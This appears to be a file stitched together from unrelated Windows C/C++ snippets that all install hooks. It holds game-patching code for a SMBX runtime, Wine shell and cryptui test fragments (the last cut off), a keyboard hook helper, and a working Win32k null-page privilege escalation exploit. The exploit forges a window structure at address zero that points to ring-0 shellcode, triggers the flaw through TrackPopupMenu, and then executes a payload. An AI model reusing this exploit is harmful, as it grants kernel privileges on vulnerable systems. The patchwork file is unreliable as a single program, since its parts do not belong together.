void TrySkipPatch()
{
//Check for arguments and write them in gStartupSettings
ParseArgs(splitCmdArgsW(std::wstring(GetCommandLineW())));
// If we have stdin/stdout, attach to the IPC server
ipcServer.AttachStdinStdout();
if (gStartupSettings.patch){
PATCH(0x8BECF2).NOP_PAD_TO_SIZE<0x1B5>().Apply(); //nop out the loader code
*(WORD*)(0xB25046) = -1; //set run to true
PATCH(0x8BED00).CALL(&InitHook).Apply();
}
// Init freeimage:
gFreeImgInit.init();
// Insert callback for patching which must occur after the runtime has started
// (0x8BEC61 is not quite as early as would be ideal for this, but it's convenient)
PATCH(0x8BEC61).CALL(&LatePatch).Apply();
//Load graphics from the HardcodedGraphicsManager
HardcodedGraphicsManager::loadGraphics();
// Either in root or in config folder. The config folder is recommended however.
gGeneralConfig.setFilename(getLatestConfigFile(L"luna.ini"));
gGeneralConfig.loadOrDefault();
//game.ini reader
GameConfiguration::runPatchByIni(INIReader(WStr2Str(getLatestConfigFile(L"game.ini"))));
/************************************************************************/
/* Simple ASM Source Patches */
/************************************************************************/
fixup_TypeMismatch13();
fixup_Credits();
fixup_Mushbug();
fixup_Veggibug();
fixup_NativeFuncs();
fixup_BGODepletion();
/************************************************************************/
/* Replaced Imports */
/************************************************************************/
IMP_vbaStrCmp = &replacement_VbaStrCmp;
/************************************************************************/
/* Set Hook */
/************************************************************************/
HookWnd = SetWindowsHookExA(WH_CALLWNDPROC, MsgHOOKProc, (HINSTANCE)NULL, GetCurrentThreadId());
if (!HookWnd){
DWORD errCode = GetLastError();
std::string errCmd = "Failed to Hook";
errCmd += "\nErr-Code: ";
errCmd += std::to_string((long long)errCode);
MessageBoxA(NULL, errCmd.c_str(), "Failed to Hook", NULL);
}
KeyHookWnd = SetWindowsHookExA(WH_KEYBOARD, KeyHOOKProc, (HINSTANCE)NULL, GetCurrentThreadId());
if (!KeyHookWnd){
DWORD errCode = GetLastError();
std::string errCmd = "Failed to Hook";
errCmd += "\nErr-Code: ";
errCmd += std::to_string((long long)errCode);
MessageBoxA(NULL, errCmd.c_str(), "Failed to Hook", NULL);
}
/************************************************************************/
/* Source Code Function Patch */
/************************************************************************/
PATCH(0x8D9446)
.CALL(&OnLvlLoad)
.NOP()
.NOP()
.Apply();
PATCH(0x8CA23B)
.CALL(&TestFunc)
.NOP()
.Apply();
PATCH(0x92EC24)
.CALL(&LevelHUDHook)
.Apply();
*(void**)0xB2F244 = (void*)&mciSendStringHookA;
PATCH(0x8D6BB6).CALL(&forceTermination).Apply();
PATCH(0x8C11D5).CALL(&LoadWorld).Apply();
PATCH(0x8C16F7).CALL(&WorldLoop).Apply();
PATCH(0x8C0E6D).CALL(&LoadIntro).Apply();
PATCH(0x932353).CALL(&printLunaLuaVersion).Apply();
PATCH(0x9090F5).CALL(&WorldRender).Apply();
PATCH(0x9204E5).CALL(&NPCKillHook).Apply();
PATCH(0x9B4E35).CALL(&NPCKillHook).Apply();
PATCH(0xA0664E).CALL(&NPCKillHook).Apply();
PATCH(0xA23278).CALL(&NPCKillHook).Apply();
PATCH(0xAA4352)
.CALL(&__vbaStrCmp_TriggerSMBXEventHook)
.NOP()
.Apply();
PATCH(0x8C23CB)
.CALL(&checkLevelShutdown)
.NOP()
.NOP()
.Apply();
PATCH(0xA755D2).CALL(&UpdateInputHook_Wrapper).Apply();
PATCH(0x902D3D).CALL(&WorldOverlayHUDBitBltHook).Apply();
PATCH(0x902DFC).CALL(&WorldOverlayHUDBitBltHook).Apply();
PATCH(0x902EBB).CALL(&WorldOverlayHUDBitBltHook).Apply();
PATCH(0x902F80).CALL(&WorldOverlayHUDBitBltHook).Apply();
PATCH(0x908995).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x9087A8).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x9085BB).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x9083CE).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x908115).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x907F28).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x907D3B).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x907B4E).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x9077FD).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x907537).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x9072B2).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x90702D).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x906DB2).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x9055CE).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x905304).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x9051A7).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x905055).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x904F24).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x908995).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x904D4F).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x9062E0).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x906183).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x906031).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x905F00).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x905D29).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x905990).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x9065DE).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x906973).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x90499A).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x9046D0).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x904573).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x904421).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x9042F0).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x90411B).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x906B31).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x903D66).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x9063FF).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x903A9C).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x90393F).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x9037ED).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x9036BC).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x9034E7).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x9032E9).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x90323D).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x90319F).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x9030F2).CALL(&WorldIconsHUDBitBltHook).Apply();
PATCH(0x9000B2).CALL(&WorldHUDIsOnCameraHook).Apply();
PATCH(0x900235).CALL(&WorldHUDIsOnCameraHook).Apply();
PATCH(0x9004B7).CALL(&WorldHUDIsOnCameraHook).Apply();
PATCH(0x90068F).CALL(&WorldHUDIsOnCameraHook).Apply();
PATCH(0x901439).CALL(&WorldHUDPrintTextController).Apply();
PATCH(0x90266A).CALL(&WorldHUDPrintTextController).Apply();
PATCH(0x907611).CALL(&WorldHUDPrintTextController).Apply();
PATCH(0x9081E7).CALL(&WorldHUDPrintTextController).Apply();
PATCH(0x908B03).CALL(&WorldHUDPrintTextController).Apply();
PATCH(0x908A67).CALL(&WorldHUDPrintTextController).Apply();
PATCH(0x909217).CALL(&GenerateScreenshotHook).Apply();
PATCH(0x94D5E7).CALL(&GenerateScreenshotHook).Apply();
PATCH(0x8C03DC).CALL(&InitLevelEnvironmentHook).Apply();
PATCH(0x8C0A1A).CALL(&InitLevelEnvironmentHook).Apply();
PATCH(0x8C1383).CALL(&InitLevelEnvironmentHook).Apply();
PATCH(0x8C1953).CALL(&InitLevelEnvironmentHook).Apply();
PATCH(0x8CE292).CALL(&InitLevelEnvironmentHook).Apply();
PATCH(0x8E61BD).CALL(&InitLevelEnvironmentHook).Apply();
PATCH(0x8FE8D4).CALL(&InitLevelEnvironmentHook).Apply();
PATCH(0x987E94).CALL(&InitLevelEnvironmentHook).Apply();
PATCH(0x9B7B2C).CALL(&InitLevelEnvironmentHook).Apply();
PATCH(0xA02AD3).CALL(&InitLevelEnvironmentHook).Apply();
// Graphics Bitblt hooks
PATCH(0x8C137E).CALL(&LoadLocalGfxHook).Apply();
PATCH(0x8D8BF1).CALL(&LoadLocalGfxHook).Apply();
PATCH(0x8D9611).CALL(&LoadLocalGfxHook).Apply();
PATCH(0x8DF52B).CALL(&LoadLocalGfxHook).Apply();
PATCH(0x8DFF7C).CALL(&LoadLocalGfxHook).Apply();
PATCH(0x8DEF73).CALL(&LoadLocalOverworldGfxHook).Apply();
PATCH(0x8DF808).CALL(&LoadLocalOverworldGfxHook).Apply();
//PATCH(0x4242D0).JMP(GET_RETADDR_TRACE_HOOK<&BitBltTraceHook>()).Apply();
PATCH(0x4242D0).JMP(&BitBltHook).Apply();
PATCH(0x424314).JMP(&StretchBltHook).Apply();
PATCH(0x8E54EC)
.CALL(&MessageBoxOpenHook)
.NOP()
.Apply();
// Okay redigit, I know your debug values are in general pretty dumb, but right now they are awesome for easy patching! Thx mate!
PATCH(0x90C856)
.CALL(&CameraUpdateHook_Wrapper)
.NOP()
.NOP()
.Apply();
// Hook to fix 100% CPU when window is inactive
PATCH(0x8E6FE1)
.NOP()
.CALL(&WindowInactiveHook)
.Apply();
// PATCH(0x96CC61).TRACE_CALL<&HardcodedGraphicsBitBltHook>().Apply();
// Don't trust QPC as much on WinXP
void* frameTimingHookPtr;
void* frameTimingMaxFPSHookPtr;
if (gIsWindowsVistaOrNewer) {
frameTimingHookPtr = (void*)&FrameTimingHookQPC;
frameTimingMaxFPSHookPtr = (void*)&FrameTimingMaxFPSHookQPC;
}
else {
frameTimingHookPtr = (void*)&FrameTimingHook;
frameTimingMaxFPSHookPtr = (void*)&FrameTimingMaxFPSHook;
}
// Hooks to fix 100% CPU during operation
// These ones are normally not sensitive to the "max FPS" setting
PATCH(0x8BFD4A).SAFE_CALL(frameTimingHookPtr).NOP_PAD_TO_SIZE<0x40>().Apply();
PATCH(0x8C0488).SAFE_CALL(frameTimingHookPtr).NOP_PAD_TO_SIZE<0x40>().Apply();
PATCH(0x8C0EE6).SAFE_CALL(frameTimingHookPtr).NOP_PAD_TO_SIZE<0x40>().Apply();
// These ones are normally sensitive to the "max FPS" setting
PATCH(0x8C15A7).SAFE_CALL(frameTimingMaxFPSHookPtr).NOP_PAD_TO_SIZE<0x4A>().Apply();
PATCH(0x8C20FC).SAFE_CALL(frameTimingMaxFPSHookPtr).NOP_PAD_TO_SIZE<0x4A>().Apply();
PATCH(0x8E2AED).SAFE_CALL(frameTimingMaxFPSHookPtr).NOP_PAD_TO_SIZE<0x4A>().Apply();
PATCH(0x8E56ED).SAFE_CALL(frameTimingMaxFPSHookPtr).NOP_PAD_TO_SIZE<0x4A>().Apply();
// Logging for NPC collisions
//PATCH(0xA281B0).JMP(GET_RETADDR_TRACE_HOOK<&collideNPCLoggingHook>()).NOP().Apply();
// Level and world render hooks
PATCH(0x909290).JMP(RenderLevelHook).NOP().Apply();
PATCH(0x8FEB10).JMP(RenderWorldHook).NOP().Apply();
// Level rendering layering hooks
//PATCH(0x90C856).NOP().NOP().CALL(GetRenderBelowPriorityHook<-95>()).Apply();
//-100: Level Background
PATCH(0x90F4FA).NOP().NOP().CALL(GetRenderBelowPriorityHook<-95>()).Apply();
// -95: Furthest back BGOs
PATCH(0x910433).NOP().NOP().CALL(GetRenderBelowPriorityHook<-90>()).Apply();
// -90: Sizable Blocks
PATCH(0x910E5D).NOP().NOP().CALL(GetRenderBelowPriorityHook<-85>()).Apply();
// -85: Some more BGOs
PATCH(0x911F19).NOP().NOP().CALL(GetRenderBelowPriorityHook<-80>()).Apply();
// -80: Warp - Derived BGOs (locks on doors and stuff)
PATCH(0x912748).NOP().NOP().CALL(GetRenderBelowPriorityHook<-75>()).Apply();
// -75: Background NPCs (vines, piranah plants, diggable sand, mother brain, things in MB jars)
PATCH(0x915316).NOP().NOP().CALL(GetRenderBelowPriorityHook<-70>()).Apply();
// -70: Held NPCs
PATCH(0x91D422).NOP().NOP().CALL(GetRenderBelowPriorityHook<-65>()).Apply();
// -65: Normal Blocks
PATCH(0x91DD44).NOP().NOP().CALL(GetRenderBelowPriorityHook<-60>()).Apply();
// -60: Furthest Back Effects (doors, pressed p-switches, some other stuff)
PATCH(0x91E1F2).NOP().NOP().CALL(GetRenderBelowPriorityHook<-55>()).Apply();
// -55: Some NPCs (i.e. coins, clown car, chompy, herb, wood rocket, koopaling fire)
PATCH(0x91F802).NOP().NOP().CALL(GetRenderBelowPriorityHook<-50>()).Apply();
// -50: Some NPCs (ice blocks)
PATCH(0x920040).NOP().NOP().CALL(GetRenderBelowPriorityHook<-45>()).Apply();
// -45: Normal NPCs
PATCH(0x922D00).NOP().NOP().CALL(GetRenderBelowPriorityHook<-40>()).Apply();
// -40: Symbol above NPCs that want to chat (hardcoded-43/44)
PATCH(0x923786).NOP().NOP().CALL(GetRenderBelowPriorityHook<-35>()).Apply();
// -35: Player Mounts
PATCH(0x927F21).NOP().NOP().CALL(GetRenderBelowPriorityHook<-30>()).Apply();
// -30: Something else player mount related?
PATCH(0x928EA5).NOP().NOP().CALL(GetRenderBelowPriorityHook<-25>()).Apply();
// -25: Players
PATCH(0x928F0A).NOP().NOP().CALL(GetRenderBelowPriorityHook<-20>()).Apply();
// -20: Foreground BGOs
PATCH(0x929F81).NOP().NOP().CALL(GetRenderBelowPriorityHook<-15>()).Apply();
// -15: Foreground NPCs
PATCH(0x92B428).NOP().NOP().CALL(GetRenderBelowPriorityHook<-10>()).Apply();
// -10: Foreground Blocks
PATCH(0x92BAC0).NOP().NOP().CALL(GetRenderBelowPriorityHook<-5>()).Apply();
// -5: Foreground Effects (all not at 0091DD90)
// Handle Priority 5 from LevelHUDHook
// 5: HUD
PATCH(0x939977).NOP().NOP().CALL(GetRenderBelowPriorityHook<100>()).Apply();
// Change Mode Hook
// Runs when the game starts or the game mode changes.
PATCH(0x8BF4E3).CALL(runtimeHookSmbxChangeModeHookRaw).NOP_PAD_TO_SIZE<10>().Apply();
// Load level hook
PATCH(0x8D8F40).JMP(runtimeHookLoadLevel).NOP_PAD_TO_SIZE<6>().Apply();
// Close window hook
PATCH(0x8BE3DA).CALL(runtimeHookCloseWindow).Apply();
// Anti-Fullscreen hook
PATCH(0x95429A).CALL(runtimeHookChangeResolution).Apply();
PATCH(0xA98142).CALL(runtimeHookChangeResolution).Apply();
PATCH(0xA98166).CALL(runtimeHookChangeResolution).Apply();
PATCH(0x96ADD7).CALL(runtimeHookSmbxCheckWindowedRaw).NOP_PAD_TO_SIZE<8>().Apply();
PATCH(0x9DB1D8).JMP(runtimeHookBlockBumpableRaw).NOP_PAD_TO_SIZE<6>().Apply();
PATCH(0xA28FE3).JMP(runtimeHookNPCVulnerabilityRaw).Apply();
PATCH(0x9A9D33).JMP(runtimeHookNPCSpinjumpSafeRaw).NOP_PAD_TO_SIZE<10>().Apply();
PATCH(0xA75079).JMP(runtimeHookCheckInputRaw).NOP_PAD_TO_SIZE<7>().Apply();
/************************************************************************/
/* Import Table Patch */
/************************************************************************/
__vbaR4Var = (float(*)(VARIANTARG*))0x00401124;
*(void**)0x00401124 = (void*)&vbaR4VarHook;
rtcMsgBox = (int(__stdcall *)(VARIANTARG*, DWORD, DWORD, DWORD, DWORD))(*(void**)0x004010A8);
*(void**)0x004010A8 = (void*)&rtcMsgBoxHook;
}
/*************************************************************************
* RegisterShellHook [SHELL.102]
*/
BOOL WINAPI RegisterShellHook16(HWND16 hWnd, UINT16 uAction)
{
TRACE("%04x [%u]\n", hWnd, uAction );
switch( uAction )
{
case 2: /* register hWnd as a shell window */
if( !SHELL_hHook )
{
SHELL_hHook = SetWindowsHookExA( WH_SHELL, SHELL_HookProc,
GetModuleHandleA("shell32.dll"), 0 );
if ( SHELL_hHook )
{
uMsgWndCreated = RegisterWindowMessageA( lpstrMsgWndCreated );
uMsgWndDestroyed = RegisterWindowMessageA( lpstrMsgWndDestroyed );
uMsgShellActivate = RegisterWindowMessageA( lpstrMsgShellActivate );
}
else
WARN("-- unable to install ShellHookProc()!\n");
}
if ( SHELL_hHook )
return ((SHELL_hWnd = HWND_32(hWnd)) != 0);
break;
default:
WARN("-- unknown code %i\n", uAction );
SHELL_hWnd = 0; /* just in case */
}
return FALSE;
}
bool initializeKeyhook() {
std::thread([=](){
if (g_hook != nullptr) {
if (g_keyboardHookedCallback)
g_keyboardHookedCallback(false);
return;
}
g_hook = SetWindowsHookExA(WH_KEYBOARD_LL, lowLevelKeyboardProc, GetModuleHandle(0), 0);
if (g_keyboardHookedCallback)
g_keyboardHookedCallback(g_hook != nullptr);
MSG msg;
while (GetMessageA(&msg, NULL, 0, 0)) {
TranslateMessage(&msg);
DispatchMessage(&msg);
}
}).detach();
return true;
}
void Win32kNullPage(LPVOID lpPayload) {
HWND hWnd;
WNDCLASSA WndClass;
LPBYTE promise_land = NULL;
HMODULE hNtdll = NULL;
HMODULE ntkrnl = NULL;
NTSTATUS status;
PULONG pSystemInfoBuffer = NULL;
lZwQuerySystemInformation pZwQuerySystemInformation = NULL;
ULONG SystemInfoBufferSize = 0;
char nt_name[256];
PVOID nt_base;
OSVERSIONINFOA VersionInformation;
// Getting Windows version
LogMessage("[*] Getting Windows version...");
memset(&VersionInformation, 0, sizeof(OSVERSIONINFOA));
VersionInformation.dwOSVersionInfoSize = 148;
if (!GetVersionExA(&VersionInformation)) {
LogMessage("[!] Failed to get windows version");
return;
}
#ifdef _M_X64
if (VersionInformation.dwMajorVersion == 6 && VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
LogMessage("[*] Windows 6.1 found...");
OffsetWindows = 0x208;
}
#else
if (VersionInformation.dwMajorVersion == 6) {
if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
LogMessage("[*] Windows 6.1 found...");
OffsetWindows = 0xf8;
}
else if (!VersionInformation.dwMinorVersion) {
LogMessage("[*] Windows 6.0 found..."); // Ex: Windows 2008 R2
OffsetWindows = 0xe0;
}
else {
LogMessage("[!] Unsupported Windows 6.%d found, only 6.0 and 6.1 supported atm", VersionInformation.dwMinorVersion);
return;
}
}
else if (VersionInformation.dwMajorVersion == 5) {
if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows XP SP3
LogMessage("[*] Windows 5.1 found...");
OffsetWindows = 0xc8;
}
else if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 2) { // Ex: Windows 2003 SP2
LogMessage("[*] Windows 5.2 found...");
OffsetWindows = 0xd8;
}
else {
LogMessage("[!] Unsupported Windows 5 found, only 5.1 and 5.2 supported atm");
return;
}
}
#endif
else {
LogMessage("[!] Major Version %d found, not supported", VersionInformation.dwMajorVersion);
return;
}
// Solve symbols
LogMessage("[*] Solving symbols...");
hNtdll = LoadLibraryA("ntdll");
if (hNtdll == NULL) {
LogMessage("[!] Failed to Load ntdll...");
return;
}
pZwQuerySystemInformation = (lZwQuerySystemInformation)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
if (pZwQuerySystemInformation == NULL) {
LogMessage("[!] Failed to solve ZwQuerySystemInformation");
return;
}
pNtAllocateVirtualMemory = (lNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
if (pNtAllocateVirtualMemory == NULL) {
LogMessage("[!] Failed to solve NtAllocateVirtualMemory");
return;
}
LogMessage("[*] Requesting Kernel loaded modules...");
status = pZwQuerySystemInformation(11, &SystemInfoBufferSize, 0, &SystemInfoBufferSize);
if (SystemInfoBufferSize == 0) {
LogMessage("[!] Requesting pZwQuerySystemInformation required length failed");
return;
}
else {
LogMessage("[*] pZwQuerySystemInformation required length %d", SystemInfoBufferSize);
}
pSystemInfoBuffer = (PULONG)LocalAlloc(LMEM_ZEROINIT, SystemInfoBufferSize);
if (pSystemInfoBuffer == NULL) {
LogMessage("[!] Allocation for SystemInfo failed");
return;
}
status = pZwQuerySystemInformation(11, pSystemInfoBuffer, SystemInfoBufferSize, &SystemInfoBufferSize);
if (status != STATUS_SUCCESS) {
LogMessage("[!] Requesting kernel modules through ZwQuerySystemInformation failed");
return;
}
LogMessage("[*] Parsing SYSTEM_INFO...");
SYSTEM_MODULE_INFORMATION *smi = (SYSTEM_MODULE_INFORMATION *)pSystemInfoBuffer;
LogMessage("[*] %d Kernel modules found\n", smi->ModulesCount);
memset(nt_name, 0, 256);
int i = 0;
while (i < smi->ModulesCount) {
SYSTEM_MODULE *sm = (SYSTEM_MODULE *)(smi->Modules + i);
LogMessage("[*] Checking module %s", sm->Name);
if (strstr((char *)sm->Name, ".exe")) {
char *start = strstr((char *)sm->Name, "nt");
if (start != NULL) {
nt_base = sm->ImageBaseAddress;
strncpy_s(nt_name, 256, start, _TRUNCATE);
break;
}
}
i++;
}
if (nt_name == NULL) {
LogMessage("[!] nt not found");
return;
}
else {
LogMessage("[*] Good! nt found as %s at 0x%08x", nt_name, nt_base);
}
ntkrnl = LoadLibraryA(nt_name);
LogMessage("[*] %s loaded in userspace at: %08x\n", nt_name, ntkrnl);
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)GetProcAddress(ntkrnl, "PsLookupProcessByProcessId");
if (pPsLookupProcessByProcessId == NULL) {
LogMessage("[!] Failed to solve PsLookupProcessByProcessId\n");
return;
}
#ifdef _M_X64
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((QWORD)nt_base + ((QWORD)pPsLookupProcessByProcessId - (QWORD)ntkrnl));
LogMessage("[*] pPsLookupProcessByProcessId in kernel: %016llx\n", pPsLookupProcessByProcessId);
#else
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD)nt_base + ((DWORD)pPsLookupProcessByProcessId - (DWORD)ntkrnl));
LogMessage("[*] pPsLookupProcessByProcessId in kernel: %08x\n", pPsLookupProcessByProcessId);
#endif
MyProcessId = GetCurrentProcessId();
// Register Class
LogMessage("[*] Registering class...");
memset(&WndClass, 0, sizeof(WNDCLASSA));
WndClass.lpfnWndProc = WndProc; // Called with CallWindowProc => http://msdn.microsoft.com/en-us/library/windows/desktop/ms633571(v=vs.85).aspx
WndClass.lpszClassName = "woqunimalegebi";
if (RegisterClassA(&WndClass) == 0) {
LogMessage("[!] RegisterClassA failed ");
return;
}
// Create Window
LogMessage("[*] Creating window...");
hWnd = CreateWindowExA(0, "woqunimalegebi", NULL, 0, -1, -1, 0, 0, NULL, NULL, NULL, NULL);
if (hWnd == NULL) {
LogMessage("[!] CreateWindowExA failed");
return;
}
// Making everything ready for exploitation...
LogMessage("[*] Allocating null page...");
#ifdef _M_X64
ULONGLONG base_address = 0x00000000fffffffb;
#else
DWORD base_address = 1;
#endif
SIZE_T region_size = 0x1000;
ULONG zero_bits = 0;
HANDLE current_process = NULL;
current_process = GetCurrentProcess();
if (pNtAllocateVirtualMemory(current_process, (LPVOID*)(&base_address), 0, ®ion_size, (MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN), PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS) {
LogMessage("[!] Failed to allocate null page");
return;
}
LogMessage("[*] Getting PtiCurrent...");
#ifdef _M_X64
ULONGLONG pti = MyPtiCurrent();
#else
DWORD pti = MyPtiCurrent();
#endif
if (pti == 0) {
LoadLibrary("user32.dll");
LoadLibrary("gdi32.dll");
pti = MyPtiCurrent();
}
if (pti == 0) {
LogMessage("[!] Filed to get PtiCurrent");
return;
}
else {
#ifdef _M_X64
LogMessage("[*] Good! pti 0x%016llx", pti);
#else
LogMessage("[*] Good! pti 0x%08x", pti);
#endif
}
LogMessage("[*] Creating a fake structure at NULL...");
#ifdef _M_X64
void *test = NULL;
(QWORD)test = 0x10000000B;
*((PQWORD)test) = pti;
/* win32k!tagWND->bServerSideWindowProc = TRUE */
(QWORD)test = 0x100000025;
*((PBYTE)test) = 4;
/* win32k!tagWND->lpfnWndProc = &shellcode_ring0 */
(QWORD)test = 0x10000008B;
*((PQWORD)test) = &shellcode_ring0;
#else
void *test = promise_land + 3;
/* We need to save this check, otherwise unmapped memory will be dereferenced (blue screen)
.text:BF8B93F4 02C mov edi, _gptiCurrent
.text:BF8B93FA 02C cmp edi, [esi + 8];
.text:BF8B93FD 02C jz loc_BF8B
*/
*(LPDWORD)test = pti;
*((LPBYTE)(promise_land + 0x11)) = 0x4;
test = promise_land + 0x5b;
*(LPDWORD)test = (DWORD)shellcode_ring0;
#endif
// Exploit!
LogMessage("[*] Triggering vulnerability...");
HMENU MenuOne = CreatePopupMenu();
if (MenuOne == NULL) {
LogMessage("[!] First CreatePopupMenu failed");
return;
}
MENUITEMINFOA MenuOneInfo;
memset(&MenuOneInfo, 0, sizeof(MENUITEMINFOA));
MenuOneInfo.cbSize = sizeof(MENUITEMINFOA);
MenuOneInfo.fMask = MIIM_STRING;
if (InsertMenuItemA(MenuOne, 0, TRUE, &MenuOneInfo) != TRUE) {
LogMessage("[!] First InsertMenuItemA failed");
DestroyMenu(MenuOne);
return;
}
HMENU MenuTwo = CreatePopupMenu();
if (MenuTwo == NULL) {
LogMessage("[!] Second CreatePopupMenu failed");
DestroyMenu(MenuOne);
return;
}
MENUITEMINFOA MenuTwoInfo;
memset(&MenuTwoInfo, 0, sizeof(MENUITEMINFOA));
MenuTwoInfo.cbSize = sizeof(MENUITEMINFOA);
MenuTwoInfo.fMask = (MIIM_STRING | MIIM_SUBMENU);
MenuTwoInfo.dwTypeData = "";
MenuTwoInfo.cch = 1;
MenuTwoInfo.hSubMenu = MenuOne;
if (InsertMenuItemA(MenuTwo, 0, TRUE, &MenuTwoInfo) != TRUE) {
LogMessage("[!] Second InsertMenuItemA failed");
DestroyMenu(MenuTwo);
DestroyMenu(MenuOne);
return;
}
if (SetWindowsHookExA(WH_CALLWNDPROC, HookCallback, NULL, GetCurrentThreadId()) == NULL) {
LogMessage("[!] SetWindowsHookExA failed :-(\n");
DestroyMenu(MenuTwo);
DestroyMenu(MenuOne);
return;
}
// 'crash' it!
TrackPopupMenu(MenuTwo, 0, -10000, -10000, 0, hWnd, NULL);
// If everything worked process should be privileges at this point
LogMessage("[!] Executing payload...");
CreateThread(0, 0, ExecutePayload, lpPayload, 0, NULL);
return;
}
static void test_crypt_ui_wiz_import(void)
{
BOOL ret;
CRYPTUI_WIZ_IMPORT_SRC_INFO info;
HCERTSTORE store;
PCCERT_CONTEXT cert;
PCCRL_CONTEXT crl;
DWORD count;
if (!pCryptUIWizImport)
{
skip("No CryptUIWizImport\n");
return;
}
/* Set CBT hook to disallow MessageBox and wizard creation in current
* thread.
*/
hook = SetWindowsHookExA(WH_CBT, cbt_hook_proc, 0, GetCurrentThreadId());
/* Brings up UI. Cancelling yields ret = 1. */
if (0)
{
pCryptUIWizImport(0, 0, NULL, NULL, NULL);
}
SetLastError(0xdeadbeef);
ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI, 0, NULL, NULL, NULL);
ok(!ret && GetLastError() == E_INVALIDARG,
"expected E_INVALIDARG, got %08x\n", GetLastError());
memset(&info, 0, sizeof(info));
SetLastError(0xdeadbeef);
ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI, 0, NULL, &info, NULL);
ok(!ret && GetLastError() == E_INVALIDARG,
"expected E_INVALIDARG, got %08x\n", GetLastError());
info.dwSize = sizeof(info);
SetLastError(0xdeadbeef);
ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI, 0, NULL, &info, NULL);
ok(!ret && GetLastError() == E_INVALIDARG,
"expected E_INVALIDARG, got %08x\n", GetLastError());
info.dwSubjectChoice = CRYPTUI_WIZ_IMPORT_SUBJECT_CERT_CONTEXT;
SetLastError(0xdeadbeef);
ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI, 0, NULL, &info, NULL);
ok(!ret && GetLastError() == E_INVALIDARG,
"expected E_INVALIDARG, got %08x\n", GetLastError());
SetLastError(0xdeadbeef);
ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CERT,
0, NULL, &info, NULL);
ok(!ret && GetLastError() == E_INVALIDARG,
"expected E_INVALIDARG, got %08x\n", GetLastError());
/* Check allowed vs. given type mismatches */
info.u.pCertContext = CertCreateCertificateContext(X509_ASN_ENCODING,
v1CertWithValidPubKey, sizeof(v1CertWithValidPubKey));
SetLastError(0xdeadbeef);
ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CRL,
0, NULL, &info, NULL);
ok(!ret && GetLastError() == E_INVALIDARG,
"expected E_INVALIDARG, got %08x\n", GetLastError());
CertFreeCertificateContext(info.u.pCertContext);
info.dwSubjectChoice = CRYPTUI_WIZ_IMPORT_SUBJECT_CRL_CONTEXT;
info.u.pCRLContext = CertCreateCRLContext(X509_ASN_ENCODING,
signedCRL, sizeof(signedCRL));
SetLastError(0xdeadbeef);
ret = pCryptUIWizImport(CRYPTUI_WIZ_NO_UI | CRYPTUI_WIZ_IMPORT_ALLOW_CERT,
0, NULL, &info, NULL);
ok(!ret && GetLastError() == E_INVALIDARG,
"expected E_INVALIDARG, got %08x\n", GetLastError());
